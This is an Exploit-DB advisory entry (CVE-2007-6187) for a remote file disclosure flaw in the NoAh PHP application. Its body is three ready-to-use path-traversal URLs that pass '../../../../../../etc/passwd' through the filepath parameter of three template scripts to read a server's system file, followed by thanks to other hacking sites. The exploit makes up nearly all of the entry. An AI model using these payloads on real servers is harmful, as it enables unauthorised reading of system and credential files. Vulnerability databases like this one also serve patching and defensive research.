NoAh <= 0.9 pre 1.2 filepath Remote File Disclosure Vulnerabilities

2007-11-28T00:00:00
ID EDB-ID:4675
Type exploitdb
Reporter GoLd_M
Modified 2007-11-28T00:00:00

Description

NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities. CVE-2007-6187. Webapps exploit for php platform

                                        
                                            NoAh &lt;= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
Script : http://sourceforge.net/project/showfiles.php?group_id=131995  /noah0.9_pre1.2.tar.gz/
Exploits :
/noah/modules/nosystem/templates/css_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/js_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/xml_file.php?filepath=../../../../../../etc/passwd
S.P Thanx To : Tryag.Com[Mahmood_ali] -- Asb-May.Net/bb[Mahmood_ali]

# milw0rm.com [2007-11-28]